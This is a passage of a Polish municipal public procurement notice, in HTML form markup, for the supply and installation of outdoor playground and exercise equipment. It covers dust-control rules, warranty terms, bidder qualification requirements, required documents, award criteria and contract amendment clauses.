Powietrza dla stref województwa śląskiego, w których stwierdzone zostały ponadnormatywne poziomy substancji w powietrzu", Zamawiający informuje, że w trakcie prowadzenia prac budowlanych będzie wymagał zastosowania technologii wykonania robót, które ograniczają do minimum pylenie stosowanych materiałów budowlanych oraz są nieuciążliwe dla środowiska.Szczególnie dla Zamawiającego jest ważne, by w trakcie prowadzenia prac budowlanych były zachowane zasady:-	zraszania wodą terenu prowadzenia robót (miejsce rozładunku, plac składowy materiałów) w okresach suszy,-	stosowania zabezpieczenia pylastych materiałów sypkich przed rozwiewaniem (przykrycie plandekami, zraszanie),-	transportu materiałów sypkich samochodami wyposażonymi w plandeki ograniczające pylenie przewożonych materiałów,-	stosowanie gotowych mieszanek budowlanych przygotowywanych w wytwórniach.Ponadto Zamawiający będzie prowadził monitoring pojazdów obsługujących budowę pod kątem ograniczenia zanieczyszczenia dróg.W przypadku stwierdzenia uchybień, które zagrażają środowisku naturalnemu i są niezgodne z przepisami polskiego prawa i powyższymi zapisami, Zamawiający wstrzyma prowadzenie robót.Przypomina się również, że:-	wykonawca jest zobowiązany do używania sprzętu i maszyn, które są zgodne z normami ochrony środowiska i przepisami dotyczącymi ich użytkowania;-	organizacja placu budowy i prowadzenie prac budowlanych nie mogą zagrażać środowisku naturalnemu.Termin usunięcia wad: do 14 dni liczone od powiadomienia Wykonawcy przez Zamawiającego o wadzie.Wykonawca jest zobowiązany do udzielenia minimum 36-miesięcznej gwarancji na zabudowane urządzenia. W ramach gwarancji Wykonawca dokonuje okresowych przeglądów (potwierdzonych protokołem) raz w roku. Serwisowanie urządzeń musi być zgodne z wymaganiami producenta zabudowanych urządzeń. Bieg terminu gwarancji rozpoczyna się od daty odbioru i przekazania w użytkowanie całego przedmiotu umowy.Stosownie do treści art. 30 ust. 9 ustawy Pzp, Zamawiający informuje, że przedmiot zamówienia, w odniesieniu do podstawowego celu jego realizacji którym jest aktywny udział w zabawach i aktywne uprawianie ćwiczeń na wolnym powietrzu nie przewiduje dostępności dla osób niepełnosprawnych. Nie ogranicza jednak tej dostępności na zasadzie uczestnictwa biernego.Szczegółowy zakres zamówienia określa SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">37410000-5</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37535200-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">112</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">dotyczy zadania 1Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwa zamówienia związane z dostawą i montażem plenerowych urządzeń zabawowych / urządzeń do ćwiczeń na wolnym powietrzu, każde z nich o wartości minimum 20.000 zł brutto. dotyczy zadania 2 i 4Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwa zamówienia związane z dostawą i montażem plenerowych urządzeń zabawowych / urządzeń do ćwiczeń na wolnym powietrzu, każde z nich o wartości minimum 14.000 zł brutto. dotyczy zadania 3Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwa zamówienia związane z dostawą i montażem plenerowych urządzeń zabawowych / urządzeń do ćwiczeń na wolnym powietrzu, każde z nich o wartości minimum 30.000 zł brutto. dotyczy zadania 5 i 6Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwa zamówienia związane z dostawą i montażem plenerowych urządzeń zabawowych / urządzeń do ćwiczeń na wolnym powietrzu, każde z nich o wartości minimum 8.000 zł brutto. W przypadku zamówień, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia zamówienia (w przypadku zamówień rozliczanych wyłącznie w walutach innych niż PLN).Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej dotyczący wykonanych dostaw musi być spełniony: 1)	przez Wykonawcę samodzielnie lub2)	przez minimum jeden podmiot (podwykonawcę) udostępniający doświadczenie samodzielnie; 3)	w przypadku podmiotów występujących wspólnie - samodzielnie przez minimum jednego z wykonawców występujących wspólnie. Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających:- spełnianie przez Wykonawcę warunków udziału w postępowaniu, tj.: wykaz dostaw wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane na formularzu zgodnym z treścią załącznika nr 5 do SIWZ, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy,-	spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego tj. kart technicznych / folderów / szkiców oferowanych urządzeń. Dokumenty te muszą zawierać minimum dane dotyczące materiałów i technologii wykonania, sposobu fundamentowania, podstawowych wymiarów oraz wizerunku, które to informacje pozwolą na ocenę spełniania minimalnych wymagań Zamawiającego. 2. Wykonawca, którego oferta zostanie najwyżej oceniona, na wezwanie Zamawiającego zobowiązany będzie złożyć oświadczenia i dokumenty podmiotu, na zdolności lub sytuację którego Wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu. Wykonawca zobowiązany będzie złożyć dokumenty tego podmiotu potwierdzające spełnianie warunków udziału w postępowaniu w zakresie zdolności lub sytuacji, na których Wykonawca polegał w celu wykazania spełniania tych warunków (dokumenty wskazane w pkt 1).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1.	Formularz oferty.2.	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.4.	Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:1)	Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.2)	podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika wprost z dokumentu stwierdzającego status prawny Wykonawcy (np. wypisu z Krajowego rejestru sądowego) - pełnomocnictwo do podpisania oferty.5.	Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Zamawiający zamieści informacje, o których mowa w art. 86 ust. 5 ustawy w pliku o nazwie ,,Zbiorcze zestawienie ofert" na swojej stronie internetowej www.bip.um.rybnik.eu.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Montaż</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1.	Zamawiający przewiduje możliwość zmiany umowy w przypadkach, o których mowa w art. 144 ust. 1 pkt 2-6 ustawy Prawo zamówień publicznych oraz w niżej opisanych przypadkach: 1)	przedłużenie terminu realizacji umowy o tyle dni, ile trwało wstrzymanie robót ze względu na odkrycie w trakcie prowadzenia robót niezinwentaryzowanych instalacji bądź konstrukcji podziemnych kolidujących z prowadzonymi pracami montażowymi i wymagającymi w związku z tym uzgodnienia nowej lokalizacji,2)	